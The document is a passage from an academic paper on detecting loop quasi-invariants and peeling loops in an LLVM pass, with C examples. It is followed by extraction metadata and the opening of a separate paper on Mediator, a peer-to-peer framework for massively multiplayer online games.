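As an illustration of Definition 1 and Definition 3, the following Python sketch encodes DFGs as matrices over the semi-ring and composes them. The encoding of the three semi-ring elements as Python values, and the matrices for the example commands, are assumptions made for this sketch, not the paper's implementation.

```python
# Sketch of the semi-ring {0, 0bar, 1} and DFG composition (Definition 3).
# Elements are encoded as 0 (no dependence), "p" (propagation, i.e. 0bar)
# and 1 (dependence); this encoding is an illustrative assumption.

NONE, PROP, DEP = 0, "p", 1
ORDER = {NONE: 0, PROP: 1, DEP: 2}

def oplus(a, b):                 # max in the tropical reading
    return a if ORDER[a] >= ORDER[b] else b

def otimes(a, b):                # + in the tropical reading, capped at DEP
    if a == NONE or b == NONE:
        return NONE
    if a == PROP and b == PROP:
        return PROP
    return DEP

def compose(A, B):
    """DFG of C1;C2 as the semi-ring matrix product M(C1)M(C2)."""
    n = len(A)
    C = [[NONE] * n for _ in range(n)]
    for i in range(n):
        for j in range(n):
            acc = NONE
            for k in range(n):
                acc = oplus(acc, otimes(A[i][k], B[k][j]))
            C[i][j] = acc
    return C

# Variables ordered as (w, x, y, z); C1 := [w = w + x; z = y + 2]
M1 = [[DEP,  NONE, NONE, NONE],   # w -> w
      [DEP,  PROP, NONE, NONE],   # x -> w, x propagated
      [NONE, NONE, PROP, DEP ],   # y propagated, y -> z
      [NONE, NONE, NONE, NONE]]   # old z is overwritten (reinitialised)
# C2 := [x = y; z = z * 2]
M2 = [[PROP, NONE, NONE, NONE],   # w propagated
      [NONE, NONE, NONE, NONE],   # old x is overwritten
      [NONE, DEP,  PROP, NONE],   # y -> x, y propagated
      [NONE, NONE, NONE, DEP ]]   # z -> z
print(compose(M1, M2))            # DFG of the sequence C1;C2
```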
We illustrate this intuitive construction on an example in Figure 4.

Figure 4: DFG of Composition. Here $C_1 := [w = w + x; z = y + 2;]$ and $C_2 := [x = y; z = z \ast 2;]$

2.2.2 Condition

We now explain how to compute the DFG of a command $C := \text{if } E \text{ then } C_1;$ from the DFG of the command $C_1$. Firstly, we notice that in $C$, all variables modified by $C_1$, i.e. in $\text{Out}(C_1)$, will depend on the variables used in $E$. Let us denote by $M(C_1)^E$ the corresponding DFG, i.e. the matrix $M(C_1) \oplus (E^{t}O)$, where $E$ (resp. $O$) is the vector\(^3\) representing the variables in $\text{Var}(E)$ (resp. in $\text{Out}(C_1)$), and $(\cdot)^t$ denotes the transpose. Secondly, we need to take into account that the command $C_1$ may be skipped. In that case, the overall command $C$ should act as an empty command, i.e. be represented by the identity matrix $\text{Id}$ (diagonal elements equal to $\bar{0}$, all others equal to 0). Finally, the DFG of a conditional will be computed by summing these two possibilities, as in Figure 5.

Definition 4 Let $C$ be a command of the form $\text{if } E \text{ then } C_1;$. Then $M(C) = M(C_1)^E \oplus \text{Id}$.

\(^3\)I.e. the vector with a coefficient equal to 1 for the variables in $\text{Var}(E)$, and 0 for all other variables.

Finally, let us define the DFG of a command $C$ of the form $C := \text{while } E \text{ do } C_1;$. This definition splits into two steps. First, we define a matrix $M(C_1^*)$ representing iterations of the command $C_1$; then we deal with the condition of the loop in the same way we interpreted the conditional above. When considering iterations of $C_1$, the first occurrence of $C_1$ will influence the second one and so on. Computing the DFG of $C_{1}^{n}$, the $n$-th iteration of $C_1$, is just computing the power of the corresponding matrix, i.e. $M(C_{1}^{n}) = M(C_1)^n$. But since the number of iterations cannot be decided a priori, we need to add all possible values of $n$. The following expression then gives the DFG of the (informal) command $C_1^*$ corresponding to "iterating $C_1$ a finite (but arbitrary) number of times":

$$M(C_1^*) = \lim_{k \to \infty} \bigoplus_{i=1}^{k} M(C_1)^i$$

To ease notations, we write $M(C_1^{(k)})$ for the partial summation $\bigoplus_{i=1}^{k} M(C_1)^i$. Since the set of all relations is finite and the sequence $(M(C_1^{(k)}))_{k \geq 0}$ is monotone, this sequence is eventually constant. I.e., there exists a natural number $N$ such that $M(C_1^{(k)}) = M(C_1^{(N)})$ for all $k \geq N$. One can obtain the following bound on the value of $N$.

**Lemma 1** Consider a command $C$ and define $K = \min(i,o)$, where $i$ (resp. $o$) denotes the number of variables in $\text{In}(C)$ (resp. $\text{Out}(C)$). Then, the sequence $(M(C^{(k)}))_{k \geq K}$ is constant.

Figure 6 illustrates the computation of $(\cdot)^*$. The second step then consists in dealing with the loop condition, using the same constructions as for conditionals.

**Definition 5** Let $C$ be a command of the form $\text{while } E \text{ do } C_1;$. Then $M(C) = M(C_1^*)^{E}$.

2.3 Independence

Our purpose is to move commands around: exchange them, but more importantly pull them out of loops when possible. We allow these moves only when the semantics is preserved: to ensure this is the case, we describe a notion of independence.

**Definition 6** If $\text{Out}(C_1) \cap \text{In}(C_2) = \emptyset$ then $C_2$ is independent from $C_1$. This is denoted $C_1 \prec C_2$.

It is important to notice that this notion is not symmetric.
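Continuing the sketch above and reusing its oplus and compose helpers, the iteration closure used in Definition 5 (without the loop-condition correction) and the independence test of Definition 6 could be written as follows; the In/Out sets in the usage example are illustrative assumptions.

```python
# Sketch of M(C1*) (partial sums until stable, cf. Lemma 1) and of the
# independence test of Definition 6. Reuses oplus/otimes/compose above.

def closure(M):
    """Partial sums M, M + M^2, ... computed until they stabilise."""
    n = len(M)
    acc, power = M, M
    while True:
        power = compose(power, M)                       # next power M^k
        new = [[oplus(acc[i][j], power[i][j]) for j in range(n)]
               for i in range(n)]
        if new == acc:                                  # sequence is eventually constant
            return acc
        acc = new

def independent(out_of_first, in_of_second):
    """C2 is independent from C1 (C1 < C2) iff Out(C1) and In(C2) are disjoint."""
    return not (set(out_of_first) & set(in_of_second))

# Illustrative sets only: Out(C1) = {b}, In(C2) = {x}  ->  C1 < C2 holds,
print(independent({"b"}, {"x"}))          # True
# but Out(C2) = {x}, In(C1) = {x, b}      ->  C2 < C1 does not hold.
print(independent({"x"}, {"x", "b"}))     # False
```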
As an example, let us consider Figure 7: Here, $C_2$ is independent from $C_1$ but the converse is not true.

Figure 7: Composition of independent chunks of commands

A particular case is self-independence, i.e. independence of a command w.r.t. itself. In that case, we can find non-trivial program transformations preserving the semantics. We denote by $[C] \equiv [D]$ the relation "$C$ and $D$ have the same semantics".

**Lemma 2 (Specialization for while)** If $C_1$ is self-independent and $\text{Var}(E) \cap \text{Out}(C_1) = \emptyset$: $[\text{while } E \text{ do } C_1] \equiv [\text{if } E \text{ then } C_1; \text{while } E \text{ do } \text{skip}]$

Remark that we need to keep the while loop with a skip statement inside because we need to consider an infinite loop if $E$ is always true, in order to keep the semantics equivalent. In general, we will consider mutual independence.

**Definition 7** If $C_2 \prec C_1$ and $C_1 \prec C_2$, we say that $C_2$ and $C_1$ are mutually independent, and write $C_1 \bowtie C_2$.

While independence in one direction only, such as in the example above, does not imply that $C_1; C_2$ and $C_2; C_1$ have the same semantics, mutual independence allows us to perform program transformations that do not impact the semantics.

**Lemma 3 (Swapping commands)** If $C_1 \bowtie C_2$, then $[C_1; C_2] \equiv [C_2; C_1]$

**Lemma 4 (Moving out of while loops)** If $C_1$ is self-independent (i.e. $C_1 \bowtie C_1$), and if $C_1 \bowtie C_2$, then: $[\text{while } E \text{ do } [C_1; C_2]] \equiv [\text{if } E \text{ then } C_1; \text{while } E \text{ do } C_2]$

Based on those lemmas, we can decide that an entire block of statements is invariant or quasi-invariant in a loop by computing the DFGs. The quasi-invariance comes with an invariance degree, which is the number of times the loop needs to be peeled to be able to hoist the corresponding invariant. We can then implement program transformations that reduce the overall complexity while preserving the semantics.

3 In practice

This section explains how we implemented the pass which computes the invariance degree, and gives the main idea of how the transformation can be performed. In the previous section, we have seen that the transformation is possible from and to a WHILE language; and in a previous implementation\(^4\) we have shown it can be done on C Abstract Syntax Trees.

Compilers, and especially LLVM on which we are working, use an Intermediate Representation (IR) to handle programs. This is an assembly-like language that is used during all the stages of the compilation. Programs (in various different languages) are first translated into the IR, then several optimisations are performed (implemented in so-called passes), and finally the resulting IR is translated into actual assembly language depending on the machine it will run on. Using a common IR allows the same optimisations to be applied to several different source languages and for several different target architectures.

One important feature of the LLVM IR is the Static Single Assignment form (SSA). A program is in SSA form if each variable is assigned at most once. In other words, putting a program in SSA form requires a massive \(\alpha\)-conversion of all the variables to ensure uniqueness of names. The advantages are obvious since this removes any name-aliasing problem and eases analysis and transformation. The main drawback of SSA comes when several different control-flow paths reach the same point (typically, after a conditional).
Then, the values used after this point may come from any branch and this cannot be statically decided. For example, if the original program is if (y) then x:=0 else x:=1; C, it is relatively easy to turn it into a pseudo-SSA form by \(\alpha\)-converting the x: if (y) then x\(_0\):=0 else x\(_1\):=1; C but we do not know in C which of x\(_0\) or x\(_1\) should be used. SSA solves this problem by using \(\varphi\)-functions that, at runtime, can choose the correct value depending on the path just taken. That is, the correct SSA form will be if (y) then x\(_0\):=0 else x\(_1\):=1; X:=\(\varphi\)(x\(_0\), x\(_1\)); C. While the SSA itself eases the analysis, we do have to take into account the \(\varphi\) functions and handle them correctly. 3.1 Preliminaries First, we want to visit all loops using a bottom-up strategy (the inner loop first). Then, as for the Loop Invariant Code Motion (LICM) pass, our pass is derived from the basic LoopPass. Which means that each time a loop is encountered, our analysis is performed. At this point, the purpose is to gather the relations of all instructions in the loop to compose them and provide the final relation for the current loop. We decided to define a Relation object by three SmallPtrSet of Value*, listing the variables, the propagations and the initializations. Furthermore we represent the dependencies by a DenseMap of Value* to SmallPtrSet<Value*>. This way of representing our data is not fixed, it's certainly optimizable, but we think it's sufficient for our prototype analysis and examples. We will discuss the cost of this analysis later. Then a Relation is generated for each command using a top-down strategy following the dominance tree. The SSA form helps us to gather dependence information on instructions. By visiting operands of each assignment, it's easy to build our map of Relation. With all the current loop's relations gathered, we compute the compositions, condition corrections and the maximums relations possible as described previously. Obviously this method can be enhanced by an analysis on bounds around conditional and number of iterations for a loop. Finally, with those composed relations we compute an invariance degree for each statement in the loop. \(^4\)https://github.com/ThomasRuby/LQICM_On_C_Toy_Parser The only chunks considered in the current implementation are the one consisting of while or if-then-else statements. ### 3.2 Invariance degree computation In this part, we will describe an algorithm – using the previous concepts – to compute the invariance degree of each quasi-invariant in a loop. After that, we will be able to peel the loop at once instead of doing it iteratively. To simplify and as a recall, Figure 8 shows a basic example of peeled loop. The invariance degrees are given as comment after each Quasi-Invariant statements. So \( b = y + y \) is invariant of degree equal to one because \( y \) is invariant, that means it could be hoisted directly in the preheader of the loop. But \( b \) is used before, in \( b = b + 1 \), so it’s not the same \( b \) at the first iteration. We need to isolate this case by peeling one time the entire loop to use the first \( b \) computed by the initial \( b \). If \( b = y + y \) is successfully hoisted, then \( b \) is now invariant. So we can remove \( b = b + 1 \) but we need to do it at least one time after the first iteration to set \( b \) to the new and invariant value. This is why the loop is peeled two times. The first time, all the statements are executed. 
The second time, the first-degree invariants are removed.

The main work is to compute the proper invariance degree for each statement and composed statement. This can be done statically using the dependency graph and the dominance graph. Here is the algorithm. Let us suppose we have computed the list of dependencies for all commands in a loop.

**Data:** Dependency Graph and Dominance Graph
**Result:** List of invariance degrees for each statement
Initialize degrees of use to \( \infty \) and others to 0;
**for** each statement \( s \) **do**
&nbsp;&nbsp;**if** the current degree \( cd \neq 0 \) **then**
&nbsp;&nbsp;&nbsp;&nbsp;skip
&nbsp;&nbsp;**else**
&nbsp;&nbsp;&nbsp;&nbsp;Initialize the current degree \( cd \) to \( \infty \);
&nbsp;&nbsp;&nbsp;&nbsp;**if** there is no dependence for the current chunk **then**
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\( cd = 1 \);
&nbsp;&nbsp;&nbsp;&nbsp;**else**
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**for** each dependence, compute the degree \( dd \) of the command **do**
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**if** \( cd \leq dd \) and the current command dominates this dependence **then** \( cd = dd + 1 \) **else** \( cd = dd \)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**end**
&nbsp;&nbsp;&nbsp;&nbsp;**end**
&nbsp;&nbsp;**end**
**end**

**Algorithm 2:** Invariance degree computation.

This algorithm is dynamic: it progressively stores each degree needed to compute the current one and reuses them. Note that, for the initialization part, we are using LLVM methods (canSinkOrHoist, isGuaranteedToExecute, etc.) to figure out whether an instruction is movable or not. These methods provide the anchor instructions for the current loop.

```c
/* original loop, with invariance degrees as comments */
while (x < 100) {
    b = b + 1;   //2
    use(b);
    x = x + 1;
    b = y + y;   //1
    use(b);
}
```

Figure 8: Example: Hoisting twice.

### 3.3 Peeling loop idea

The transformation will consist in creating as many preheader basic blocks before the loop as needed to remove all quasi-invariants out of the loop. Each preheader will have the same condition as the .cond block of the loop and will contain the incrementation of the iteration variable. The maximum invariance degree is the number of times we need to peel the loop, so we create that many preheaders before the loop. In each block created, we include every command with a higher or equal invariance degree. For instance, the first preheader block will contain every command with an invariance degree higher than or equal to 1, the second one those higher than or equal to 2, etc., and the final loop will contain every command with an invariance degree equal to ∞.

### 4 Conclusion and Future work

Developers expect compilers to provide certain more or less "obvious" optimizations. When peeling is possible, that often means: either the code was generated; or the developers prefer this form (for readability reasons) and expect that it will be optimized by the compiler; or the developers have not seen the possible optimization (mainly because of the obfuscation level of a given code). Our generic pass is able to provide a reusable abstract dependency graph and the quasi-invariance degrees for further loop optimization or analysis.

In the example of Figure 9, we compute the same factorial several times. We can detect this statically, so the compiler ought to optimize it at least at `-O3`. Our tests showed that this is done neither in LLVM nor in GCC (we also tried `-fpeel-loops` with profiling). The generated assembly shows the factorial computation in the inner loop.
Moreover, this kind of algorithm compiled with clang at `-O3` still executes the inner loop n times, so the computation time is quadratic, while hoisting the inner loop results in linear time. For the example shown in Figure 9, our pass computes the degrees shown in Figure 11 (where -1 represents a degree of ∞, that is, an instruction that cannot be hoisted).

```c
srand(time(NULL));
int n = rand() % 10000;
int j = 0;
while (j < n) {
    fact = 1;
    i = 1;
    while (i <= n) {
        fact = fact * i;
        i = i + 1;
    }
    j = j + 1;
    use(fact);
}
```

Figure 9: Hoisting inner loop

```c
srand(time(NULL));
int n = rand() % 10000;
int j = 0;
if (j < n) {
    fact = 1;
    i = 1;
    while (i <= n) {
        fact = fact * i;
        i = i + 1;
    }
    j = j + 1;
    use(fact);
}
while (j < n) {
    j = j + 1;
    use(fact);
}
```

Figure 10: LLVM Intermediate Representation

---- MapDeg of while.cond3 ----
%mul = mul nsw i32 %fact.1, %i.1 = -1
%add = add nsw i32 %i.1, 1 = -1
-------------------
---- MapDeg of while.cond ----
%fact.0 = phi i32 [ 1, %while.body ], ..., = 1
%i.1 = phi i32 [ 1, %while.body ], ..., = 1
inner loop starting with while.cond3: = 1
%fact.0.lcssa = phi i32 [ %fact.0, %while.cond3 ] = -1
%i.1.lcssa = phi i32 [ %i.1, %while.cond3 ] = -1
%call7 = call ... i32 %i.1.lcssa, i32 %fact.0.lcssa) = -1
%add8 = add nsw i32 %j.0, 1 = -1
-------------------

Figure 11: Invariance Degree

To each instruction printed corresponds an invariance degree. The assignment instructions are listed by loop: the inner loop (starting with while.cond3) and the outer loop (starting with while.cond). The inner loop has its own invariance degree, equal to 1 (line 9). Remark that we do consider the phi initialization instructions of an inner loop. Here %fact.0 and %i.1 are reinitialized in the inner loop condition block. So phi instructions are analysed in two different cases: to compute the relation of the current loop, or to give the initialization of a variable sent to an inner loop. Our analysis only takes the operand relevant to the current case and does not consider the others.

The code of this pass is available online at https://github.com/ThomasRuby/lqicm_pass. To provide some real benchmarks on large programs, we need to implement the transformation. We are currently implementing this second pass on LLVM.

Acknowledgments

The authors wish to thank L. Kristiansen for communicating a manuscript that initiated the present work. Jean-Yves Moyen is supported by the European Commission's Marie Skłodowska-Curie Individual Fellowship (H2020-MSCA-IF-2014) 655222 - Walgo; Thomas Rubiano is supported by the ANR project "Elica" ANR-14-CE25-0005; Thomas Seiller is supported by the European Commission's Marie Skłodowska-Curie Individual Fellowship (H2020-MSCA-IF-2014) 659920 - ReACT.
{"Source-Url": "https://static-curis.ku.dk/portal/files/178883921/Moyen_2017_Loop_quasi_invariant.pdf", "len_cl100k_base": 8034, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 45473, "total-output-tokens": 9893, "length": "2e12", "weborganizer": {"__label__adult": 0.0004725456237792969, "__label__art_design": 0.0003592967987060547, "__label__crime_law": 0.0004620552062988281, "__label__education_jobs": 0.0005154609680175781, "__label__entertainment": 8.255243301391602e-05, "__label__fashion_beauty": 0.0002111196517944336, "__label__finance_business": 0.00021970272064208984, "__label__food_dining": 0.0005478858947753906, "__label__games": 0.000782012939453125, "__label__hardware": 0.001476287841796875, "__label__health": 0.0009508132934570312, "__label__history": 0.0002930164337158203, "__label__home_hobbies": 0.00014090538024902344, "__label__industrial": 0.0006251335144042969, "__label__literature": 0.0003371238708496094, "__label__politics": 0.0004153251647949219, "__label__religion": 0.0007486343383789062, "__label__science_tech": 0.044036865234375, "__label__social_life": 9.91225242614746e-05, "__label__software": 0.00382232666015625, "__label__software_dev": 0.94189453125, "__label__sports_fitness": 0.0004665851593017578, "__label__transportation": 0.0008435249328613281, "__label__travel": 0.0002582073211669922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33406, 0.04356]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33406, 0.68833]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33406, 0.85182]], "google_gemma-3-12b-it_contains_pii": [[0, 901, false], [901, 4063, null], [4063, 7688, null], [7688, 10232, null], [10232, 13330, null], [13330, 15836, null], [15836, 17640, null], [17640, 20121, null], [20121, 23948, null], [23948, 26727, null], [26727, 29098, null], [29098, 29631, null], [29631, 32451, null], [32451, 33406, null]], "google_gemma-3-12b-it_is_public_document": [[0, 901, true], [901, 4063, null], [4063, 7688, null], [7688, 10232, null], [10232, 13330, null], [13330, 15836, null], [15836, 17640, null], [17640, 20121, null], [20121, 23948, null], [23948, 26727, null], [26727, 29098, null], [29098, 29631, null], [29631, 32451, null], [32451, 33406, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33406, null]], "pdf_page_numbers": [[0, 901, 1], [901, 4063, 2], [4063, 7688, 3], [7688, 10232, 4], [10232, 13330, 5], [13330, 15836, 6], [15836, 17640, 7], [17640, 20121, 8], [20121, 23948, 9], [23948, 26727, 10], [26727, 29098, 11], [29098, 29631, 12], [29631, 32451, 13], 
[32451, 33406, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33406, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
81ed6da3d38b5cb26abf1f2d71e9f99b8cd2bf3c
Heriot-Watt University

Mediator

Fan, Lu; Taylor, Hamish; Trinder, Phil

Published in: Proceedings of the 6th ACM SIGCOMM Workshop on Network and System Support for Games, NetGames '07
DOI: 10.1145/1326257.1326265
Publication date: 2007
Document version: Early version, also known as pre-print

Mediator: A Design Framework for P2P MMOGs

Lu Fan, School of Mathematical and Computer Sciences, Heriot-Watt University, Edinburgh, UK, lf16@hw.ac.uk
Hamish Taylor, School of Mathematical and Computer Sciences, Heriot-Watt University, Edinburgh, UK, h.taylor@hw.ac.uk
Phil Trinder, School of Mathematical and Computer Sciences, Heriot-Watt University, Edinburgh, UK, p.w.trinder@hw.ac.uk

ABSTRACT

With widespread use of the Internet, Massively Multiplayer Online Games (MMOGs) are becoming increasingly popular. As MMOGs scale up, conventional Client/Server (C/S) architectures exhibit various drawbacks in scalability, reliability, and redundancy. This paper presents a new Peer-to-Peer (P2P) MMOG design framework, Mediator, using a super-peer network with multiple super-peer (Mediator) roles. Mediator is novel in integrating four elements: a reward scheme, distributed resource discovery, load-management and super-peer selection. The reward scheme differentiates a peer's contribution from its reputation, and pursues symmetrical reciprocity as well as discouraging misdeeds. A deadline-driven auction protocol is proposed for distributed resource discovery. Furthermore, both common-peer and super-peer workloads are approximately balanced using a two-level load-management scheme, and super-peers are selected in a flexible, policy-based way. In this framework, the functionalities of a traditional game server are distributed, capitalising on the potential of P2P networks and enabling the MMOG to scale better in both communication and computation. A proof-of-concept prototype of this framework is described, and ongoing work is discussed.

1. INTRODUCTION

A MMOG allows thousands of players to interact simultaneously in a persistent game world over a network. With widespread use of the Internet, MMOGs are becoming increasingly popular. A recent survey [15] indicates that the number of MMOG subscribers has been increasing at a fast-growing rate. Traditionally, MMOGs have been implemented as C/S systems, which offer advantages such as centralised control, better security and simplicity of implementation. Though this widely used architecture is suitable for many types of distributed applications, it still suffers from technical and commercial drawbacks:

1) Scalability - The performance of central game servers is a bottleneck that puts a limit on the total number of players a game can accommodate.

2) Redundancy - Ensuring that a game server is powerful enough to handle peak usage rates may result in high hardware redundancy.

3) Reliability - The C/S architecture is not very fault tolerant since servers are single points of failure.
4) Cost - It takes 2 to 3 years and about 10 million dollars to launch a medium-sized MMOG, and ongoing support costs consume up to 80% of its revenues [8]. As discussed above, C/S architecture drawbacks undermine its ability to support large scale, sophisticated, interactive multiplayer online games, and thus much research effort has been put into the design and implementation of P2P MMOGs [6, 18, 3, 5, 16]. P2P architectures suggest a scalable and low cost way for building MMOGs. It enables individuals to deploy public domain MMOG software without the major investment required by previous architectures, and affords business opportunities for enterprises to market game services in a more flexible and profitable fashion, without providing a supporting hardware infrastructure and dedicated maintenance staff. P2P MMOGs have begun to attract significant academic attention since the early 2000s. Substantial research work has been carried out to address issues like game event dissemination [3, 5, 16], interest management [18, 1], and game state persistency [6, 2]. Though many important issues have been clarified and solved to some extent, little work has been published on the distributed hosting of game objects. As of June 2006, 97.6% of the deployed MMOGs fell into the MMO RPG (Role-Playing Game) category, and only about 0.3% fell into MMO FPS (First-person Shooter) [15], which shows the relative importance of MMORPGs. One main difference between them is that the former involves considerable numbers of game objects (a.k.a. non-player characters, or NPCs) such as AI-controlled monsters. Traditionally, NPCs are hosted by a central game server, consuming significant processing power and network bandwidth, and thus account for a major part of the server’s workload. In order to support a MMORPG in a P2P network, a scheme is needed for hosting game objects using common game participants’ computing resources. This paper presents a design framework, which takes into consideration a reward-based distributed resource discovery and load-management scheme within super-peer networks, and aims at distributing the functionalities of a traditional game server. The rest of this paper is organized as follows. Section 2 is a brief survey of related work. Section 3 presents the overall design of the Mediator framework. Section 4 introduces a preliminary proof-of-concept prototype that is being built. Section 5 concludes and discusses future work. 2. RELATED WORK 2.1 Game Event Dissemination Game event dissemination has become a popular research topic, because the bandwidth reduction potential of a P2P network can remove C/S communication bottlenecks at the server side. Fiedler et al. were amongst the first to advocate splitting the game world of a P2P MMOG into smaller pieces and to apply a publisher/subscriber communication model to enhance the scalability of a MMOG [3]. With the publication of a number of P2P overlay infrastructures in the early 2000s, such as Chord [14], CAN [12], Pastry [13] and Tapestry [19], game event dissemination research started to head in two opposite directions. Unstructured approaches [5, 16] emphasised the dynamic grouping of peers, and argued that each peer only needs to establish limited direct P2P connections with neighbouring peers in the same group. 
In contrast, structured approaches [6, 18] proposed building P2P MMOGs over a P2P overlay infrastructure which provides advantages such as self-organization, scalable Distributed Hash Tables (DHT), efficient routing algorithms, and transparent reconfiguration after node failures. Generally speaking, a structured design can be broken down into three layers: 1) **Structured P2P Overlay Network** - In this layer, every peer is identified by a random Id generated by a hashing function, and a routing algorithm [14, 12, 13, 19] is employed to route a message from source to destination. 2) **Super-peer Network** - Within the P2P overlay, some peers are elected to be super-peers, which operate both as a server to a set of clients, and as an equal in a network of super-peers [17]. 3) **P2P MMOG Game Zones** - Every game zone is identified by a zone Id, which serves as a rendezvous point for the peers that play in that zone. The main difference between a peer Id and a zone Id is that the former is random and temporary, whereas the latter is static and well-known by all participants of the application. Most structured approaches accord with this layered structure, with some flexibilities, e.g. how and for what purpose a super-peer is elected. 2.2 Interest Management Interest Management (IM) is a classical research topic in Networked Virtual Environments (NVE), and was initially addressed by Morse et al. in the mid 1990s [16]. Various IM algorithms have been proposed in the literature, and their performances are compared in [1]. The MOPAR infrastructure [18] is representative of recent work on distributed IM, which is especially beneficial to the design and implementation of P2P MMOGs. Unlike previous related work, MOPAR relies on a hybrid communication scheme that combines a DHT and direct P2P connections. It is argued that though the DHT can facilitate the maintenance of the game zone structure, it will introduce a considerable amount of communication overhead. Instead, MOPAR devises a completely distributed IM algorithm, which requires each peer to establish direct P2P connections to a small quantity of other peers on demand, for exchanging time critical information. 2.3 Game State Persistency A MMOG is also called a Persistent World, because of the maintaining and developing of the game world around the clock. So, the problem “how is the persistent data stored, updated, and reloaded?” immediately presents itself to game architects who aim to deploy a P2P MMOG without a centralized game server. Scott et al. propose that the entire virtual world and the game logic be combined into an entity database distributed over all peers, and adopt an agent-based approach for efficient communication and processing among strongly interacting entities [2]. Takuji et al. propose a zoned federation model, in which a zone owner is elected in each zone and works in the same way as a centralized authoritative server while it is connected to the world [6]. 3. THE MEDIATOR FRAMEWORK 3.1 Overview The Mediator framework adopts a hybrid communication architecture - a structured P2P overlay is used in the peer bootstrapping process, application level multicast is used for efficient game zone structure maintenance, and direct P2P connections are established on demand for the dissemination of time critical events. Secondly, the framework adapts quadrant zoning of a single-realm MMOG to facilitate load-management based upon dynamic zoning, because rectangles are easy to divide and combine. 
Thirdly, similar to previous structured related work, peers are organized into a hierarchical super-peer network. However, a major novelty here is that multiple super-peer roles are used in each game zone to carry out various management tasks, and some super-peer roles may have multiple instances. A super-peer is also called a Mediator, and four preliminary Mediator roles have been chosen in the current design: 1) **Boot Mediator (BM)** - A BM is the peer whose peer Id is numerically closest to a zone Id in the P2P overlay, and it is responsible for handling bootstrapping messages. A BM works in a similar way to a Home Node in MOPAR. 2) **Resource Mediator (RM)** - A RM is a super-peer that is responsible for the distributed resource discovery and matchmaking job, whose working protocol is discussed in section 3.3. In each game zone, multiple RM instances may coexist and work in parallel. 3) **Interest-Management Mediator (IMM)** - As indicated by its name, an IMM is responsible for the interest-management job. Its working protocol is like but is more complex than a Master Node in MOPAR (details about the collaboration between the IMM and the RM are given in section 3.3). 4) **Zone Mediator (ZM)** - A ZM is responsible for the selection of other super-peers and for roughly balancing out the workload among multiple super-peer instances. Moreover, a ZM also monitors the working state of other super-peers within the game zone, and replaces failed super-peers with capable backups in good time. More details about the ZM working protocol are given in section 3.4. The contribution of the Mediator framework lies in providing a way of distributing the functionalities of a traditional game server in a P2P network, especially the hosting of non-player game objects, which is a significant issue but has been addressed by little related work. The framework is flexible and extensible. On the one hand, new Mediator roles can be easily introduced into the framework according to newly identified requirements, and on the other hand, the framework is compatible with various distributed anti-cheating, interest management, reputation management, and anti-free-riding algorithms. The Mediator framework comprises four sub-topics that are discussed from section 3.2 to 3.5. 3.2 Reward Scheme 3.2.1 Rationale of the reward scheme Well-known P2P applications, such as Napster, Gnutella and Bit torrent show that P2P systems are by nature voluntary resource sharing systems, in which there is always a tension between individual concerns and collective welfare. Due to this characteristic, Mediator adopts a pull-based scheduling strategy which is more appropriate for maintaining the viability of a P2P MMOG. In this case, a reward scheme is crucial to keep a record of the resources that a peer has contributed to the system, and accordingly, to entitle the peer to consume roughly equivalent resources from other peers. Thus, selfish peers can be identified and discouraged, and a sufficient level of resource sharing can be ensured to make use of the P2P application beneficial. 3.2.2 Design of the reward scheme Determining how contributors are rewarded raises two sub-issues: the quantification and the qualification of contributions. Firstly, Mediator quantifies contributions in two different ways. On the one hand, common peers can contribute their computing resources by pulling and hosting gaming objects. Such jobs come with a computational complexity, which can be measured, and a contributor rewarded in a per-job fashion. 
However, on the other hand, a Mediator’s workload may vary over time, so it is relatively harder to trace and measure. In this case, it is proposed to reward Mediators purely according to their hardware configuration and online time. Therefore, strong peers should be motivated to take Mediator jobs, as well as to stay online for a longer time. Secondly, because a contribution scheme is only an accounting mechanism that facilitates symmetrical reciprocity, it is inadequate in discouraging disadvantageous behaviour, e.g. a player pretends to have a stronger machine in order to earn more contribution points, but the machine is overloaded by excessive tasks and consequently degrades other players’ gaming experiences; or, a Mediator disconnects from the system abruptly, putting the system into an inconsistent state which takes much time and inconvenience to recover from. In this case, a reputation scheme becomes necessary for qualifying a peer’s resources and creditability. By tracking a peer’s historical behaviour, its overall manner towards P2P collaborations can be made accountable for its positive or negative contribution to the system. Thus, Mediator rewards contributors by both increasing their reputation score and their contribution points. The former is helpful to promote future “sales” of their resources, and the latter entitles them to consume equivalent resources from other peers. It is important to notice that the reputation and contribution scores can be used in various beneficial ways rather than only within the reward scheme, e.g. the resource discovery scheme described in the next section attempts to enhance the gaming experience, such as minimizing latency, of favourable peers with good reputation and high contribution scores. Currently, the Mediator framework recommends the EigenTrust reputation management algorithm [7] and the DCRC anti-free-riding algorithm [4] as possible implementations for the reward scheme. Though originally the two algorithms were designed for P2P file-sharing applications, they can be easily adapted and used in a P2P MMOG. 3.3 Distributed Resource Discovery 3.3.1 Condor-like opportunistic match-making Mediator adopts a Condor-like match-making approach for resource 